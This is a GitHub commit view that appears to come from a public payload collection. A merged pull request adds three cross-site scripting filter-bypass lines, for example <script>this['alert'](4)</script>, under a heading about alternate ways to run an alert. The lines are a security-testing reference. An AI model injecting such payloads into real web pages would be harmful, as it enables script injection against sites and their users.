Merge pull request #7 from rakeshmane/master

Update README.md
This commit is contained in:
Swissky 2017-08-07 19:29:35 +02:00 committed by GitHub
commit 91e3c6906c

View File

@ -469,6 +469,10 @@ Bypass using an alternate way to execute an alert
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
<script>top['alert'](3)</script>
<script>this['alert'](4)</script>
<script>frames['alert'](5)</script>
<script>content['alert'](6)</script>
```
Bypass using an alternate way to trigger an alert